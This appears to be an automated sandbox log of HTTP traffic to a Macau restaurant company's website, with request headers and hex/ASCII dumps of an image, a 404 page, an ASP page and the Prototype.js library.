00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: #ExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 11:34:010221^nv(~"nHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:21.632101059 CET2503OUTGET /images/menu02b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:21.849483967 CET2517INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1520
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a28a2ff8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 3e 03 01 11 00 02 11 01 03 11 01 ff c4 00 8c 00 01 00 03 00 03 01 00 00 00 00 00 00 00 00 00 00 00 03 04 06 01 05 07 08 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 08 10 00 01 04 01 03 04 02 01 03 05 00 00 00 00 00 00 01 02 03 04 05 11 00 12 06 21 31 22 07 13 14 32 41 61 71 52 23 53 16 17 11 00 02 01 02 04 04 04 03 09 01 00 00 00 00 00 00 01 02 11 00 03 21 31 12 04 41 51 13 05 71 81 22 32 f0 61 a1 91 b1 c1 d1 f1 72 92 24 06 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 dd fa f9 66 b8 15 67 eb 4c 30 cd 80 8a f1 80 97 84 75 4e f8 d5 f0 87 8a 4a c3 65 cc 6d dc 52 09 c6 73 8e ba bf 45 f4 6b d2 74 cc 4c 61 39 c4 e5 31 c2 a6 30 9a ad bf 54 a8 a6 fd 29 4d fa 52 9b f4 a5 37 e9 4a 6f d2 95 f4 47 ac 21 22 a3 8e 57 bb 35 55 c8 89 ec 3b 07 a0 5d 7d d9 d0 e2 38 9a 66 da 72 29 5b 28 94 f3 6b 5e 5f 78 af fb 61 47 2d 01 df 03 5e ff 00 fc f5 81 63 6c a5 f4 c6 e1 8a b6 a6 45 3d 20 0a 48 0e 41 3e b6 27 d3 3e c1 5b 96 44 2e 3c 7c 32 ae 81 35 d5 5c 7b d7 fc 92 a7 96 c6 b0 92 aa 8e 6c 88 9f 5a bd d6 a3 2d 6f 35 15 d4 15 17 5e 69 e0 13 b4 29 43 08 39 e8 3a 03 b8 69 0d bd ad af 6f bb 6b 72 18 e8 dc 44 29 0b 88 52 33 21 b0 89 39 19 c3 c6 ab a4 2a 10 dc ea a5 f7 01 e3 bc 4f fd a6 c6 d9 fb 1b 6a ba bb 28 35 d4 b0 a2 38 d4 59 0e 19 f1 3e f2 55 21 f5 b2 fa 11 f1 b5 84 90 96 ce e5 7f 48 d6 2d e7 64 db 6c 7a d7 2e 17 64 57 55 50 a4 2b 1d 6b d4 96 62 18 08 5c 30 5c 5b 95 43 5a 09 24 e5 f0 6a 3e 45 eb da 6a 9a 6e 55 73 0e 6c c7 99 81 1b 8f 4f a1 6d e2 da 56 18 ba 43 ab 5a 25 24 23 aa d1 f1 80 36 94 8f d4 8e b8 15 df 76 2b 36 2c de ba ac c4 28 b4 c9 31 ed ba 09 21 f0 cc 47 08 a8 7b 40 02 7c 3e b5 a4 87 c5 b8 7d 00 e6 31 66 d5 cc b9 0d f0 a8 17 28 79 c9 11 d0 b6 97 29 51 54 e8 60 aa 23 bf 1a f7 39 84 af ae 13 94 90 73 b8 6f da ed bb 3d af 5d 5d 19 ff 00 ae 8f 9a c8 d5 a2 74 fa 0c 19 38 37 01 22 0c cd 5c 22 ac ce 38 4f c6 15 87 f5 59 4b 9c ae c5 2c 21 41 2e 51 5e 06 1a 52 82 97 83 01 fd a9 24 04 e4 fe e0 0f e3 5c 8f f3 80 1d db 69 e3 6e ec 7f 06 ac 76 7d de 47 ee a9 78 a0 69 5e b6 f6 32 64 ba 63 c6 7a cf 8e b6 e4 9d a5 5b 47 cb 2c ac 80 3b 94 a7 ae 35 6e da a0 f6 dd d0 63 00 bd 9c 7c de 7e ca 27 b1 bc aa fc fe 19 c6 63 5f d0 b4 13 25 8e 1d 65 22 4b 4b e6 0a b9 86 f4 67 da 69 1b 83 88 53 70 d2 18 71 00 6e 2c 39 b9 6a e8 81 82 42 b5 9a f7 68 da a6 e2 d8 c4 58 62 47 53 a8 85 48 03 31 09 e8 61 99 b6 d2 c7 da 20 e3 52 6d ac 8e 5c e4 7e 5f 4a f2 9b 2b cb 3b 74 56 35 63 2b e7 6e 9e 1a 20 56 b6 10 84 25 a8 ed 95 29 28 01 09 48 27 2a 24 a8 e4 93 dc 9d 70 37 1b ab b7 c2 07 32 11
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed>!1"2AaqR#S!1AQq"2ar$?fgL0uNJemRsEktLa910T)MR7JoG!"W5U;]}8fr)[(k^_xaG-^clE= HA>'>[D.<|25\{lZ-o5^i)C9:iokrD)R3!9*Oj(58Y>U!H-dlz.dWUP+kb\0\[CZ$j>EjnUslOmVCZ%$#6v+6,(1!G{@|>}1f(y)QT`#9so=]]t87"\"8OYK,!A.Q^R$\inv}Gxi^2dcz[G,;5nc|~'c_%e"KKgiSpqn,9jBhXbGSH1a Rm\~_J+;tV5c+n V%)(H'*$p72
                                                                                                                                                              Mar 13, 2023 05:26:28.942013025 CET2724OUTGET /static/bootstrap/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/Index.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:29.145812035 CET2735INHTTP/1.1 404 Not Found
                                                                                                                                                              Content-Length: 1635
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:34 GMT
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                              Mar 13, 2023 05:26:40.087611914 CET2770OUTGET /AboutUs.asp HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:40.332520008 CET2773INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:46 GMT
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Content-Length: 11557
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Expires: Mon, 13 Mar 2023 04:26:46 GMT
                                                                                                                                                              Cache-control: private
                                                                                                                                                              Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 47 6f 75 72 6d 65 74 20 48 6f 75 73 65 20 4d 61 63 61 75 20 4c 74 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6d 61 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 3c 21 2d 2d 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 73 77 61 70 49 6d 67 52 65 73 74 6f 72 65 28 29 20 7b 20 2f 2f 76 33 2e 30 0d 0a 20 20 76 61 72 20 69 2c 78 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 4d 4d 5f 73 72 3b 20 66 6f 72 28 69 3d 30 3b 61 26 26 69 3c 61 2e 6c 65 6e 67 74 68 26 26 28 78 3d 61 5b 69 5d 29 26 26 78 2e 6f 53 72 63 3b 69 2b 2b 29 20 78 2e 73 72 63 3d 78 2e 6f 53 72 63 3b 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 70 72 65 6c 6f 61 64 49 6d 61 67 65 73 28 29 20 7b 20 2f 2f 76 33 2e 30 0d 0a 20 20 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 3b 20 69 66 28 64 2e 69 6d 61 67 65 73 29 7b 20 69 66 28 21 64 2e 4d 4d 5f 70 29 20 64 2e 4d 4d 5f 70 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 0d 0a 20 20 20 20 76 61 72 20 69 2c 6a 3d 64 2e 4d 4d 5f 70 2e 6c 65 6e 67 74 68 2c 61 3d 4d 4d 5f 70 72 65 6c 6f 61 64 49 6d 61 67 65 73 2e 61 72 67 75 6d 65 6e 74 73 3b 20 66 6f 72 28 69 3d 30 3b 20 69 3c 61 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0d 0a 20 20 20 20 69 66 20 28 61 5b 69 5d 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 21 3d 30 29 7b 20 64 2e 4d 4d 5f 70 5b 6a 5d 3d 6e 65 77 20 49 6d 61 67 65 3b 20 64 2e 4d 4d 5f 70 5b 6a 2b 2b 5d 2e 73 72 63 3d 61 5b 69 5d 3b 7d 7d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 66 69 6e 64 4f 62 6a 28 6e 2c 20 64 29 20 7b 20 2f 2f 76 34 2e 30 31 0d 0a 20 20 76 61 72 20 70 2c 69 2c 78 3b 20 20 69 66 28 21 64 29 20 64 3d 64 6f 63 75 6d 65 6e 74 3b 20 69 66 28 28 70 3d 6e 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 29 3e 30 26 26 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 2e 6c 65 6e 67 74 68 29 20 7b 0d 0a 20 20 20 20 64 3d 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 5b 6e 2e 73 75 62 73 74 72 69 6e 67 28 70 2b 31 29 5d 2e 64 6f 63 75 6d 65 6e 74 3b 20 6e 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 70 29 3b 7d 0d 0a 20 20 69 66 28 21 28 78 3d 64 5b 6e 5d 29 26 26 64 2e 61 6c 6c 29 20 78 3d 64 2e 61 6c 6c 5b 6e 5d 3b 20 66 6f 72 20 28 69 3d 30 3b 21 78 26 26 69 3c 64 2e 66 6f 72 6d 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 20 78 3d 64 2e 66 6f 72 6d 73 5b 69 5d 5b 6e 5d 3b 0d 0a 20 20 66
                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Gourmet House Macau Ltd</title><link href="main.css" rel="stylesheet" type="text/css" /><script type="text/JavaScript">...function MM_swapImgRestore() { //v3.0 var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}}function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);} if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n]; f
                                                                                                                                                              Mar 13, 2023 05:26:40.473272085 CET2788OUTGET /js/prototype.js HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:40.797244072 CET2803INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 47603
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:12 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e42f4ca3a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:46 GMT
                                                                                                                                                              Data Raw: 2f 2a 20 20 50 72 6f 74 6f 74 79 70 65 20 4a 61 76 61 53 63 72 69 70 74 20 66 72 61 6d 65 77 6f 72 6b 2c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 30 0a 20 2a 20 20 28 63 29 20 32 30 30 35 20 53 61 6d 20 53 74 65 70 68 65 6e 73 6f 6e 20 3c 73 61 6d 40 63 6f 6e 69 6f 2e 6e 65 74 3e 0a 20 2a 0a 20 2a 20 20 54 48 49 53 20 46 49 4c 45 20 49 53 20 41 55 54 4f 4d 41 54 49 43 41 4c 4c 59 20 47 45 4e 45 52 41 54 45 44 2e 20 57 68 65 6e 20 73 65 6e 64 69 6e 67 20 70 61 74 63 68 65 73 2c 20 70 6c 65 61 73 65 20 64 69 66 66 0a 20 2a 20 20 61 67 61 69 6e 73 74 20 74 68 65 20 73 6f 75 72 63 65 20 74 72 65 65 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 74 68 65 20 50 72 6f 74 6f 74 79 70 65 20 64 61 72 63 73 20 72 65 70 6f 73 69 74 6f 72 79 2e 0a 20 2a 0a 20 2a 20 20 50 72 6f 74 6f 74 79 70 65 20 69 73 20 66 72 65 65 6c 79 20 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 75 6e 64 65 72 20 74 68 65 20 74 65 72 6d 73 20 6f 66 20 61 6e 20 4d 49 54 2d 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 0a 20 2a 20 20 46 6f 72 20 64 65 74 61 69 6c 73 2c 20 73 65 65 20 74 68 65 20 50 72 6f 74 6f 74 79 70 65 20 77 65 62 20 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 69 6f 2e 6e 65 74 2f 0a 20 2a 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 0a 76 61 72 20 50 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 20 20 56 65 72 73 69 6f 6e 3a 20 27 31 2e 34 2e 30 27 2c 0a 20 20 53 63 72 69 70 74 46 72 61 67 6d 65 6e 74 3a 20 27 28 3f 3a 3c 73 63 72 69 70 74 2e 2a 3f 3e 29 28 28 5c 6e 7c 5c 72 7c 2e 29 2a 3f 29 28 3f 3a 3c 5c 2f 73 63 72 69 70 74 3e 29 27 2c 0a 0a 20 20 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 2c 0a 20 20 4b 3a 20 66 75 6e 63 74 69 6f 6e 28 78 29 20 7b 72 65 74 75 72 6e 20 78 7d 0a 7d 0a 0a 76 61 72 20 43 6c 61 73 73 20 3d 20 7b 0a 20 20 63 72 65 61 74 65 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d 0a 0a 76 61 72 20 41 62 73 74 72 61 63 74 20 3d 20 6e 65 77 20 4f 62 6a 65 63 74 28 29 3b 0a 0a 4f 62 6a 65 63 74 2e 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 64 65 73 74 69 6e 61 74 69 6f 6e 2c 20 73 6f 75 72 63 65 29 20 7b 0a 20 20 66 6f 72 20 28 70 72 6f 70 65 72 74 79 20 69 6e 20 73 6f 75 72 63 65 29 20 7b 0a 20 20 20 20 64 65 73 74 69 6e 61 74 69 6f 6e 5b 70 72 6f 70 65 72 74 79 5d 20 3d 20 73 6f 75 72 63 65 5b 70 72 6f 70 65 72 74 79 5d 3b 0a 20 20 7d 0a 20 20 72 65 74 75 72 6e 20 64 65 73 74 69 6e 61 74 69 6f 6e 3b 0a 7d 0a 0a 4f 62 6a 65 63 74 2e 69 6e 73 70 65 63 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 6f 62 6a 65 63 74 29 20 7b 0a 20 20 74 72 79 20 7b 0a 20 20 20 20 69 66 20 28 6f 62 6a 65 63 74 20 3d
                                                                                                                                                              Data Ascii: /* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff * against the source tree, available from the Prototype darcs repository. * * Prototype is freely distributable under the terms of an MIT-style license. * * For details, see the Prototype web site: http://prototype.conio.net/ */*--------------------------------------------------------------------------*/var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x}}var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } }}var Abstract = new Object();Object.extend = function(destination, source) { for (property in source) { destination[property] = source[property]; } return destination;}Object.inspect = function(object) { try { if (object =
                                                                                                                                                              Mar 13, 2023 05:26:41.417548895 CET2868OUTGET /js/effects.js HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
